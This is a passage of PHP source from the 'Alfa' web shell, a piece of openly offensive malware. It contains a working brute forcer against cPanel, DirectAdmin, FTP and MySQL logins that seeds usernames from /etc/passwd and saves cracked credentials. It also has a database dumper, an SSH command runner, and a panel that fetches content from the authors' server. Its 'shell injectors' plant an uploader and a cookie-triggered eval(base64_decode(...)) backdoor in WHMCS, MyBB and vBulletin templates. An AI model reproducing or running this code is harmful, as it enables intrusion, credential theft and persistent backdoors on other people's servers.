1837. echo '<div class="header"><center><p><div class="txtfont_header">| Alfa + |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'plus\',null,\'news\');">| News | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'tools\')">| Tools | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'about\')">| About Us | </a></h3></center>';
1838. if ($_POST['alfa1'] == 'news' || $_POST['alfa1'] == 'tools')
1839. {
1840. try
1841. {
1842. $s1 = 'http://solevisible.com/' . ($_POST['alfa1'] == 'news' ? 'news.php' : 'tools.php');
1843. $msg = "<center><font color='red'><b><p>Can`t Connect to Remote Server ...!<br>Please Try Again Later...!</p></b></font></center>";
1844. $news = new AlfaCURL();
1845. if ($news->Send($s1))
1846. {
1847. $xml = $news->Send($s1);
1848. }
1849. else
1850. {
1851. $xml = false;
1852. }
1853. if ($xml)
1854. {
1855. if (@simplexml_load_string($xml))
1856. {
1857. $doc = new DOMDocument;
1858. $doc->loadXML($xml);
1859. $data = $doc->getElementsByTagName('data')
1860. ->item(0);
1861. $items = $data->getElementsByTagName('item');
1862. foreach ($items as $item)
1863. {
1864. $title = $item->getElementsByTagName('title')
1865. ->item(0)->nodeValue;
1866. $description = $item->getElementsByTagName('description')
1867. ->item(0)->nodeValue;
1868. $link = $item->getElementsByTagName('link')
1869. ->item(0)->nodeValue;
1870. $pubDate = $item->getElementsByTagName('pubDate')
1871. ->item(0)->nodeValue;
1872. echo (__pre() . "<center><a href='$link' target='_blank'>$title</a><br>$description<br><small><font color='#FFFFFF'><b>Date: $pubDate</b></font></small></center></pre>");
1873. }
1874. }
1875. else
1876. {
1877. echo ($msg);
1878. }
1879. }
1880. else
1881. {
1882. echo ($msg);
1883. }
1884. }
1885. catch(Exception $e)
1886. {
1887. echo $e->getMessage();
1888. }
1889. }
1890. elseif ($_POST['alfa1'] == 'about')
1891. {
1892. echo __pre() . "<pre><center><img src='http://solevisible.com/images/farvahar-iran.png'><br><br><b><font size='+3' color='#00A220'>&#9774; ~ PEACE ~ &#9774;</font><b><br><br><font color='#00A220'>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br><br><font color='#00A220'>Contact : solevisible@gmail.com</font><br><br><font color='#00A220'>Telegram Channel: @solevisible</font><br><br><font color='#FFFFFF'>Skype : ehsan.invisible</font><br><br><font color='#FFFFFF'>Skype : sole.sad</font><br><br><font color='#FF0000'>Persian Gulf For Ever</font><br><br><font color='#FF0000'>Iranian Hackers :)</font><br><br><font color='#FF0000'>Our Friends : Mr.PERSIA , R3veC0der</font><br><br></center></pre><iframe src='tg://resolve?domain=solevisible' frameborder='0' width='0' height='0'></iframe>";
1893. }
1894. echo ('</div>');
1895. alfafooter();
1896. }
1897. function alfaDumper()
1898. {
1899. alfahead();
1900. echo ('<div class="header">');
1901. echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>" . getConfigHtml('all') . "<form method='post' onsubmit=\"g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;\"><p>";
1902. $table = array(
1903. 'td1' => array(
1904. 'color' => 'FFFFFF',
1905. 'tdName' => 'db_host : ',
1906. 'inputName' => 'db_host',
1907. 'id' => 'db_host',
1908. 'inputValue' => 'localhost',
1909. 'inputSize' => '50'
1910. ) ,
1911. 'td2' => array(
1912. 'color' => 'FFFFFF',
1913. 'tdName' => 'db_username : ',
1914. 'inputName' => 'db_username',
1915. 'id' => 'db_user',
1916. 'inputValue' => '',
1917. 'inputSize' => '50'
1918. ) ,
1919. 'td3' => array(
1920. 'color' => 'FFFFFF',
1921. 'tdName' => 'db_password : ',
1922. 'inputName' => 'db_password',
1923. 'id' => 'db_pw',
1924. 'inputValue' => '',
1925. 'inputSize' => '50'
1926. ) ,
1927. 'td4' => array(
1928. 'color' => 'FFFFFF',
1929. 'tdName' => 'db_name : ',
1930. 'inputName' => 'db_name',
1931. 'id' => 'db_name',
1932. 'inputValue' => '',
1933. 'inputSize' => '50'
1934. ) ,
1935. 'td5' => array(
1936. 'color' => 'FFFFFF',
1937. 'tdName' => 'Dump Path: ',
1938. 'inputName' => 'dfile',
1939. 'inputValue' => htmlspecialchars($GLOBALS['cwd']) . 'alfa.sql',
1940. 'inputSize' => '50'
1941. )
1942. );
1943. create_table($table);
1944. echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
1945. $username = ($_POST['alfa3']);
1946. $password = ($_POST['alfa4']);
1947. $dbname = ($_POST['alfa5']);
1948. $dfile = ($_POST['alfa6']);
1949. $host = ($_POST['alfa7']);
1950. if (!empty($dbname))
1951. {
1952. echo __pre();
1953. $msg = "<center>Check this : <font color='red'>" . $dfile . "</font></center>";
1954. if (@mysqli_connect($host, $username, $password, $dbname))
1955. {
1956. if (strlen(alfaEx("mysqldump")) > 0)
1957. {
1958. alfaEx("mysqldump --single-transaction --host=\"$host\" --user=\"$username\" --password=\"$password\" $dbname > '" . addslashes($dfile) . "'");
1959. echo ($msg);
1960. }
1961. else
1962. {
1963. __alert("Error...!");
1964. }
1965. }
1966. else
1967. {
1968. echo ('<center>mysqli_connect : Error!</center>');
1969. }
1970. }
1971. echo ('</div>');
1972. alfafooter();
1973. }
1974. function Alfa_DirectAdmin_Cracker($info)
1975. {
1976. if (!$info['mysql']) $url = $info['protocol'] . $info['target'] . ':' . $info['port'] . '/CMD_LOGIN';
1977. else $url = $info['protocol'] . $info['target'] . '/phpmyadmin';
1978. $curl = curl_init();
1979. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
1980. curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
1981. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
1982. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
1983. curl_setopt($curl, CURLOPT_HEADER, 0);
1984. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
1985. curl_setopt($curl, CURLOPT_URL, $url);
1986. curl_setopt($curl, CURLOPT_USERPWD, $info['username'] . ':' . $info['password']);
1987. if ($info['mysql']) curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
1988. $result = curl_exec($curl);
1989. $curl_errno = curl_errno($curl);
1990. $curl_error = curl_error($curl);
1991. if ($curl_errno > 0)
1992. {
1993. echo "<font color='red'>Error: $curl_error</font><br>";
1994. }
1995. elseif (preg_match('/CMD_FILE_MANAGER|frameset/i', $result))
1996. {
1997. echo 'UserName: <font color="red">' . $info['username'] . '</font> PassWord: <font color="red">' . $info['password'] . '</font><font color="green"> Login Success....</font><br>';
1998. $info['target'] = $url;
1999. CrackerResualt($info);
2000. }
2001. curl_close($curl);
2002. }
2003. function Alfa_CP_Cracker($info)
2004. {
2005. $url = $info['protocol'] . $info['target'] . ':' . $info['port'];
2006. $curl = curl_init();
2007. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
2008. curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
2009. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
2010. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
2011. curl_setopt($curl, CURLOPT_HEADER, 0);
2012. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
2013. curl_setopt($curl, CURLOPT_HTTPHEADER, array(
2014. "Authorization: Basic " . __ZW5jb2Rlcg($info['username'] . ":" . $info['password']) . "\n\r"
2015. ));
2016. curl_setopt($curl, CURLOPT_URL, $url);
2017. $result = curl_exec($curl);
2018. $curl_errno = curl_errno($curl);
2019. $curl_error = curl_error($curl);
2020. if ($curl_errno > 0)
2021. {
2022. echo "<font color='red'>Error: $curl_error</font><br>";
2023. }
2024. elseif (preg_match('/filemanager/i', $result))
2025. {
2026. echo 'UserName: <font color="red">' . $info['username'] . '</font> PassWord: <font color="red">' . $info['password'] . '</font><font color="green"> Login Success....</font><br>';
2027. $info['target'] = $url;
2028. CrackerResualt($info);
2029. }
2030. curl_close($curl);
2031. }
2032. function Alfa_FTP_Cracker($info)
2033. {
2034. $url = $info['protocol'] . $info['target'];
2035. $curl = curl_init();
2036. curl_setopt($curl, CURLOPT_URL, $url);
2037. curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
2038. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
2039. curl_setopt($curl, CURLOPT_USERPWD, "" . $info['username'] . ":" . $info['password'] . "");
2040. $result = curl_exec($curl);
2041. $curl_errno = curl_errno($curl);
2042. $curl_error = curl_error($curl);
2043. if ($curl_errno > 0)
2044. {
2045. echo "<font color='red'>Error: $curl_error</font><br>";
2046. }
2047. elseif (preg_match('/(\d+):(\d+)/i', $result))
2048. {
2049. echo 'UserName: <font color="red">' . $info['username'] . '</font> PassWord: <font color="red">' . $info['password'] . '</font><font color="green"> Login Success....</font><br>';
2050. $info['target'] = $url;
2051. CrackerResualt($info);
2052. }
2053. curl_close($curl);
2054. }
2055. function Alfa_Mysql_Cracker($info)
2056. {
2057. if (@mysqli_connect($info['target'] . ':' . $info['port'], $info['username'], $info['password']))
2058. {
2059. CrackerResualt($info);
2060. echo 'UserName: <font color="red">' . $info['username'] . '</font> PassWord: <font color="red">' . $info['password'] . '</font><font color="green"> Login Success....</font><br>';
2061. }
2062. }
2063. function Alfa_FTPC($info)
2064. {
2065. if ($con = @ftp_connect($info['target'], $info['port']))
2066. {
2067. if ($con)
2068. {
2069. $login = @ftp_login($con, $info['username'], $info['password']);
2070. if ($login)
2071. {
2072. CrackerResualt($info);
2073. }
2074. }
2075. }
2076. @ftp_close($con);
2077. }
2078. function CrackerResualt($info)
2079. {
2080. $res = $info['target'] . ' => ' . $info['username'] . ":" . $info['password'] . "\n";
2081. $c = @fopen($info['fcrack'], 'a+');
2082. @fwrite($c, $res);
2083. @fclose($c);
2084. }
2085. function Alfa_Call_Function_Cracker($method, $info)
2086. {
2087. switch ($method)
2088. {
2089. case 'cp':
2090. return Alfa_CP_Cracker($info);
2091. break;
2092. case 'direct':
2093. case 'phpmyadmin':
2094. return Alfa_DirectAdmin_Cracker($info);
2095. break;
2096. case 'ftp':
2097. return Alfa_FTP_Cracker($info);
2098. break;
2099. case 'mysql':
2100. return Alfa_Mysql_Cracker($info);
2101. break;
2102. case 'mysql':
2103. return Alfa_FTPC($info);
2104. break;
2105. }
2106. }
2107. function alfaCrackers()
2108. {
2109. alfahead();
2110. echo '<div class="header"><center><br><div class="txtfont_header">| Brute Forcer |</div><br><br><form method="post" onsubmit="g(\'Crackers\',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,\'start\',this.protocol.value,this.loginpanel.value);return false;"><div class="txtfont">Login Page: <select onclick="dis_input(this.value);" name="loginpanel">';
2111. foreach (array(
2112. 'cp' => 'Cpanel',
2113. 'direct' => 'DirectAdmin',
2114. 'ftp' => 'FTP',
2115. 'phpmyadmin' => 'PhpMyAdmin[DirectAdmin]',
2116. 'mysql' => 'mysql_connect()',
2117. 'ftpc' => 'ftp_connect()'
2118. ) as $key => $val) echo ('<option value="' . $key . '">' . $val . '</option>');
2119. echo '</select> Protocol: <select id="protocol" name="protocol">';
2120. foreach (array(
2121. 'https://',
2122. 'http://',
2123. 'ftp://'
2124. ) as $val) echo ('<option value="' . $val . '">' . $val . '</option>');
2125. echo '</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">Port: <input id="port" type="text" name="port" value="2083"><table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table> <textarea placeholder="Users" rows="20" cols="25" name="usernames">' . ($GLOBALS['sys'] == 'unix' ? alfaEx("cut -d: -f1 /etc/passwd") : "") . '</textarea>&nbsp <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>Save Result Into File <input type="text" name="fcrack" value="cracked.txt"><p><input type="submit" name="cracking" value=" " /></div></form></p><center>';
2126. $target = str_replace(array(
2127. 'https://',
2128. 'http://',
2129. 'ftp://'
2130. ) , '', $_POST['alfa1']);
2131. $port = $_POST['alfa2'];
2132. $usernames = $_POST['alfa3'];
2133. $passwords = $_POST['alfa4'];
2134. $fcrack = $_POST['alfa5'];
2135. $cracking = $_POST['alfa6'];
2136. $protocol = $_POST['alfa7'];
2137. $loginpanel = $_POST['alfa8'];
2138. $p = $loginpanel == 'phpmyadmin' ? $p = true : false;
2139. if ($cracking == 'start')
2140. {
2141. echo __pre();
2142. $exuser = explode("\n", $usernames);
2143. $expw = explode("\n", $passwords);
2144. foreach ($exuser as $user)
2145. {
2146. foreach ($expw as $pw)
2147. {
2148. $array = array(
2149. 'username' => trim($user) ,
2150. 'password' => trim($pw) ,
2151. 'port' => trim($port) ,
2152. 'target' => trim($target) ,
2153. 'protocol' => trim($protocol) ,
2154. 'fcrack' => trim($fcrack) ,
2155. 'mysql' => $p
2156. );
2157. Alfa_Call_Function_Cracker($loginpanel, $array);
2158. }
2159. }
2160. echo '<br><font color="red">Attack Finished...</font>';
2161. }
2162. echo '</div>';
2163. alfafooter();
2164. }
2165. function alfassh2()
2166. {
2167. if (function_exists('ssh2_connect'))
2168. {
2169. $_SESSION['connected'] = false;
2170. $ssh_ip = $_POST['alfa1'];
2171. $ssh_login = $_POST['alfa2'];
2172. $ssh_pass = $_POST['alfa3'];
2173. $ssh_port = $_POST['alfa4'];
2174. $ssh_command = $_POST['alfa5'];
2175. if ($alfaconnect2ssh = @ssh2_connect($ssh_ip, $ssh_port))
2176. {
2177. if ($alfalogin = @ssh2_auth_password($alfaconnect2ssh, $ssh_login, $ssh_pass))
2178. {
2179. $_SESSION['connected'] = true;
2180. }
2181. }
2182. if ($_SESSION['connected'] !== true)
2183. {
2184. alfahead();
2185. echo "<div class=header>";
2186. echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,this.ssh_ip.value,this.ssh_login.value,this.ssh_pass.value,this.ssh_port.value); return false;'><table cellpadding='2' cellspacing='0'><tr><td><font color=\"#ffffff\"><b>IP</b></font></td><td><font color=\"#ffffff\"><b>SSH USER</b></font></td><td><font color=\"#ffffff\"><b>SSH PASS</b></font></td><td><font color=\"#ffffff\"><b>SSH PORT</b></font></td><td></td></tr><tr><td><input type=text name=ssh_ip value=''></td><td><input type=text name=ssh_login value=''></td><td><input type=text name=ssh_pass value=''></td><td><input type=text name=ssh_port value=''></td><td><input type='submit' name='submit' value=' '></td></table></form></div>";
2187. alfafooter();
2188. }
2189. if ($_SESSION['connected'] == true)
2190. {
2191. alfahead();
2192. echo "<div class=header>";
2193. echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,\"" . $ssh_ip . "\",\"" . $ssh_login . "\",\"" . $ssh_pass . "\",\"" . $ssh_port . "\",this.ssh_command.value,\">>\"); return false;'><table cellpadding='2' cellspacing='0'><tr><td><input type=text name=ssh_command value=''></td><td><input type='submit' name='execute' value=' '></td></table></form><form name='ssh2' method='post' onsubmit='g(\'ssh2\',null,\'\',\'\',\'\'); return false;'><input type=submit name='destsession' value='logout'></form>";
2194. $alfastream = ssh2_exec($alfaconnect2ssh, $ssh_command);
2195. stream_set_blocking($alfastream, true);
2196. $output = ssh2_fetch_stream($alfastream, SSH2_STREAM_STDIO);
2197. if ($_POST['alfa6'] == '>>')
2198. {
2199. echo '<pre class=ml1>';
2200. ob_start();
2201. echo stream_get_contents($output);
2202. echo htmlspecialchars(ob_get_clean());
2203. }
2204. echo "</div>";
2205. alfafooter();
2206. }
2207. }
2208. else
2209. {
2210. alfahead();
2211. echo '<div class=header><p><center><b><font color="red">Server does not support SSH2</font><p></b></center></div>';
2212. alfafooter();
2213. }
2214. }
2215. function output($string)
2216. {
2217. echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='" . $string . "'>Click Here !</a></font></b></center><br><br>";
2218. }
2219. function alfaShellInjectors()
2220. {
2221. alfahead();
2222. echo '<div class=header>';
2223. echo '<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,\'whmcs\',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,\'mybb\')">| MyBB | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,null,\'vb\')">| vBulletin |</a></h3></center>';
2224. $selector = '<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>';
2225. if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'whmcs')
2226. {
2227. echo __pre() . "<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>" . getConfigHtml('whmcs') . "</p><form onSubmit=\"g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\" method='post'>";
2228. $table = array(
2229. 'td1' => array(
2230. 'color' => 'FFFFFF',
2231. 'tdName' => 'Path WHMCS Url : ',
2232. 'inputName' => 'path',
2233. 'inputValue' => 'http://site.com/whmcs',
2234. 'inputSize' => '50'
2235. ) ,
2236. 'td2' => array(
2237. 'color' => 'FFFFFF',
2238. 'tdName' => 'Mysql Host : ',
2239. 'inputName' => 'dbh',
2240. 'id' => 'db_host',
2241. 'inputValue' => 'localhost',
2242. 'inputSize' => '50'
2243. ) ,
2244. 'td3' => array(
2245. 'color' => 'FFFFFF',
2246. 'tdName' => 'Db Name : ',
2247. 'inputName' => 'dbn',
2248. 'id' => 'db_name',
2249. 'inputValue' => '',
2250. 'inputSize' => '50'
2251. ) ,
2252. 'td4' => array(
2253. 'color' => 'FFFFFF',
2254. 'tdName' => 'Db User : ',
2255. 'inputName' => 'dbu',
2256. 'id' => 'db_user',
2257. 'inputValue' => '',
2258. 'inputSize' => '50'
2259. ) ,
2260. 'td5' => array(
2261. 'color' => 'FFFFFF',
2262. 'tdName' => 'Db Pass : ',
2263. 'inputName' => 'dbp',
2264. 'id' => 'db_pw',
2265. 'inputValue' => '',
2266. 'inputSize' => '50'
2267. )
2268. );
2269. create_table($table);
2270. echo $selector;
2271. echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>";
2272. if (isset($_POST['alfa6']))
2273. {
2274. $dbu = $_POST['alfa6'];
2275. $dbn = $_POST['alfa7'];
2276. $dbp = $_POST['alfa8'];
2277. $dbh = $_POST['alfa9'];
2278. $path = $_POST['alfa10'];
2279. $method = $_POST['alfa4'];
2280. $index = "{php}" . ALFA_UPLOADER . ";{/php}";
2281. $newin = str_replace("'", "\'", $index);
2282. $newindex = "<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}";
2283. if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index))
2284. {
2285. if (filter_var($path, FILTER_VALIDATE_URL))
2286. {
2287. $conn = mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn));
2288. $soleSave = mysqli_query($conn, "select message from tblemailtemplates where name='Password Reset Validation'");
2289. $soleGet = mysqli_fetch_assoc($soleSave);
2290. $tempSave1 = $soleGet['message'];
2291. $tempSave = str_replace("'", "\'", $tempSave1);
2292. $inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'";
2293. $result = mysqli_query($conn, $inject) or die(mysqli_error($conn));
2294. $create = "insert into tblclients (email) values('solevisible@fbi.gov')";
2295. $result2 = mysqli_query($conn, $create) or die(mysqli_error($conn));
2296. if (function_exists('curl_version') && $method == 'auto')
2297. {
2298. $AlfaSole = new AlfaCURL(true);
2299. $saveurl = $AlfaSole->Send($path . "/pwreset.php");
2300. $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i", $saveurl, $token);
2301. $AlfaSole->Send($path . "/pwreset.php", "post", "token={$token[1]}&action=reset&email=solevisible@fbi.gov");
2302. $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
2303. $Solevisible = mysqli_query($conn, $backdata) or die(mysqli_error($conn));
2304. __alert("shell injectet...");
2305. $ff = 'http://' . $path . "/solevisible.php";
2306. output($ff);
2307. }
2308. else
2309. {
2310. echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target => </font><a href='" . $path . "/pwreset.php' target='_blank'>" . $path . "/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color='#FFFFFF'>And Go To => </font><a href='" . $path . "/solevisible.php' target='_blank'>" . $path . "/solevisible.php</a></b></center><br><br>";
2311. }
2312. }
2313. else
2314. {
2315. __alert('Path is not Valid...');
2316. }
2317. }
2318. }
2319. }
2320. if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'mybb')
2321. {
2322. echo __pre() . "<p><div class='txtfont_header'>| MyBB |</div></p><center><center>" . getConfigHtml("mybb") . "<form id='sendajax' onSubmit=\"g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\" method=POST>
2323. ";
2324. $table = array(
2325. 'td1' => array(
2326. 'color' => 'FFFFFF',
2327. 'tdName' => 'Host : ',
2328. 'inputName' => 'dbh',
2329. 'id' => 'db_host',
2330. 'inputValue' => 'localhost',
2331. 'inputSize' => '50'
2332. ) ,
2333. 'td2' => array(
2334. 'color' => 'FFFFFF',
2335. 'tdName' => 'DataBase Name : ',
2336. 'inputName' => 'dbn',
2337. 'id' => 'db_name',
2338. 'inputValue' => '',
2339. 'inputSize' => '50'
2340. ) ,
2341. 'td3' => array(
2342. 'color' => 'FFFFFF',
2343. 'tdName' => 'User Name : ',
2344. 'inputName' => 'dbu',
2345. 'id' => 'db_user',
2346. 'inputValue' => '',
2347. 'inputSize' => '50'
2348. ) ,
2349. 'td4' => array(
2350. 'color' => 'FFFFFF',
2351. 'tdName' => 'Password : ',
2352. 'inputName' => 'dbp',
2353. 'id' => 'db_pw',
2354. 'inputValue' => '',
2355. 'inputSize' => '50'
2356. ) ,
2357. 'td5' => array(
2358. 'color' => 'FFFFFF',
2359. 'tdName' => 'Table Prefix : ',
2360. 'inputName' => 'prefix',
2361. 'id' => 'db_prefix',
2362. 'inputValue' => 'mybb_',
2363. 'inputSize' => '50'
2364. )
2365. );
2366. create_table($table);
2367. echo $selector;
2368. echo "<p><input type=submit value=' '></p></form></center></center>";
2369. if (isset($_POST['alfa6']))
2370. {
2371. $dbu = $_POST['alfa6'];
2372. $dbn = $_POST['alfa7'];
2373. $dbp = $_POST['alfa8'];
2374. $dbh = $_POST['alfa9'];
2375. $prefix = $_POST['alfa10'];
2376. $method = $_POST['alfa4'];
2377. $shellCode = "{\${" . ALFA_UPLOADER . "}}";
2378. $newinshell = str_replace("'", "\'", $shellCode);
2379. if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell))
2380. {
2381. $conn = mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn));
2382. $inject = "select template from {$prefix}templates where title= 'calendar'";
2383. $result = mysqli_query($conn, $inject) or die(mysqli_error($conn));
2384. $GetTemp = mysqli_fetch_assoc($result);
2385. $saveDate = $GetTemp['template'];
2386. $repsave = str_replace($shellCode, "", $saveDate);
2387. $repsave = str_replace("'", "\'", $repsave);
2388. $createShell = "update {$prefix}templates SET template= '" . $newinshell . $repsave . "' where title = 'calendar'";
2389. $result2 = mysqli_query($conn, $createShell) or die(mysqli_error($conn));
2390. $geturl = "select value from {$prefix}settings where name= 'bburl'";
2391. $findurl = mysqli_query($conn, $geturl) or die(mysqli_error($conn));
2392. $rowb = mysqli_fetch_assoc($findurl);
2393. $furl = $rowb['value'];
2394. $realurl = parse_url($furl, PHP_URL_HOST);
2395. $realpath = parse_url($furl, PHP_URL_PATH);
2396. $res = false;
2397. $AlfaCurl = new AlfaCURL();
2398. if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto')
2399. {
2400. if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10))
2401. {
2402. @fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n");
2403. @fputs($fsock, "HOST: $realurl\r\n");
2404. @fputs($fsock, "Connection: close\r\n\r\n");
2405. $check = fgets($fsock);
2406. if (preg_match("/200 OK/i", $check))
2407. {
2408. $repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'";
2409. $clear = mysqli_query($conn, $repairdbtemp) or die(mysqli_error($conn));
2410. $res = true;
2411. }
2412. @fclose($fsock);
2413. }
2414. }
2415. elseif (function_exists('curl_version') && $method == 'auto')
2416. {
2417. $AlfaCurl->Send($realurl . $realpath . "/calendar.php");
2418. $res = true;
2419. }
2420. if ($res)
2421. {
2422. $ff = 'http://' . $realurl . $realpath . "/solevisible.php";
2423. output($ff);
2424. }
2425. else
2426. {
2427. $ff = 'http://' . $realurl . $realpath . "/calendar.php";
2428. $fff = 'http://' . $realurl . $realpath . "/solevisible.php";
2429. echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='" . $ff . "' target='_blank'>" . $ff . "</a><br/><font color='#FFFFFF'>And Go To => </font><a href='" . $fff . "' target='_blank'>" . $fff . "</a></b></center><br><br>";
2430. }
2431. }
2432. }
2433. }
2434. if (isset($_POST['alfa3']) && $_POST['alfa3'] == 'vb')
2435. {
2436. echo __pre() . '<p><div class="txtfont_header">| vbulletin |</div></p><p>' . getConfigHtml('vb') . '</p><form name="frm" method="POST" onsubmit="g(\'ShellInjectors\',null,null,this.lo.value,\'vb\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">';
2437. $table = array(
2438. 'td1' => array(
2439. 'color' => 'FFFFFF',
2440. 'tdName' => 'Host : ',
2441. 'inputName' => 'lo',
2442. 'id' => 'db_host',
2443. 'inputValue' => 'localhost',
2444. 'inputSize' => '50'
2445. ) ,
2446. 'td2' => array(
2447. 'color' => 'FFFFFF',
2448. 'tdName' => 'DataBase Name : ',
2449. 'inputName' => 'db',
2450. 'id' => 'db_name',
2451. 'inputValue' => '',
2452. 'inputSize' => '50'
2453. ) ,
2454. 'td3' => array(
2455. 'color' => 'FFFFFF',
2456. 'tdName' => 'User Name : ',
2457. 'inputName' => 'user',
2458. 'id' => 'db_user',
2459. 'inputValue' => '',
2460. 'inputSize' => '50'
2461. ) ,
2462. 'td4' => array(
2463. 'color' => 'FFFFFF',
2464. 'tdName' => 'Password : ',
2465. 'inputName' => 'pass',
2466. 'id' => 'db_pw',
2467. 'inputValue' => '',
2468. 'inputSize' => '50'
2469. ) ,
2470. 'td5' => array(
2471. 'color' => 'FFFFFF',
2472. 'tdName' => 'Table Prefix : ',
2473. 'inputName' => 'tab',
2474. 'id' => 'db_prefix',
2475. 'inputValue' => '',
2476. 'inputSize' => '50'
2477. )
2478. );
2479. create_table($table);
2480. echo $selector;
2481. echo '<p><input type="submit" value=" " /></p></form></center>';
2482. if (isset($_POST['alfa4']) && !empty($_POST['alfa4']))
2483. {
2484. $method = $_POST['alfa8'];
2485. $code = "{\${" . ALFA_UPLOADER . "}}{\${exit()}}&";
2486. $conn = @mysqli_connect($_POST['alfa2'], $_POST['alfa4'], $_POST['alfa5'], $_POST['alfa7']) or die(@mysqli_error($conn));
2487. $rec = "select `template` from " . $_POST['alfa6'] . "template WHERE title ='faq'";
2488. $recivedata = @mysqli_query($conn, $rec);
2489. $getd = @mysqli_fetch_assoc($recivedata);
2490. $savetoass = $getd['template'];
2491. $code = str_replace("'", "\'", $code);
2492. $p = "UPDATE " . $_POST['alfa6'] . "template SET `template`='" . $code . "' WHERE `title`='faq'";
2493. $ka = @mysqli_query($conn, $p) or die(mysqli_error($conn));
2494. $geturl = @mysqli_query($conn, "select `value` from " . $_POST['alfa6'] . "setting WHERE `varname`='bburl'");
2495. $getval = @mysqli_fetch_assoc($geturl);
2496. $saveval = $getval['value'];
2497. $realurl = parse_url($saveval, PHP_URL_HOST);
2498. $realpath = parse_url($saveval, PHP_URL_PATH);
2499. $res = false;
2500. $AlfaCurl = new AlfaCURL();
2501. if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto')
2502. {
2503. if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10))
2504. {
2505. @fputs($fsock, "GET $realpath/faq.php HTTP/1.1\r\n");
2506. @fputs($fsock, "HOST: $realurl\r\n");
2507. @fputs($fsock, "Connection: close\r\n\r\n");
2508. $check = fgets($fsock);
2509. if (preg_match("/200 OK/i", $check))
2510. {
2511. $p1 = "UPDATE " . $_POST['alfa6'] . "template SET template ='" . str_replace("'", "\'", $savetoass) . "' WHERE title ='faq'";
2512. $ka1 = @mysqli_query($conn, $p1) or die(mysqli_error($conn));
2513. $res = true;
2514. }
2515. @fclose($fsock);
2516. }
2517. }
2518. elseif (function_exists('curl_version') && $method == 'auto')
2519. {
2520. $AlfaCurl->Send($realurl . $realpath . "/faq.php");
2521. $p1 = "UPDATE " . $_POST['alfa6'] . "template SET template ='" . str_replace("'", "\'", $savetoass) . "' WHERE title ='faq'";
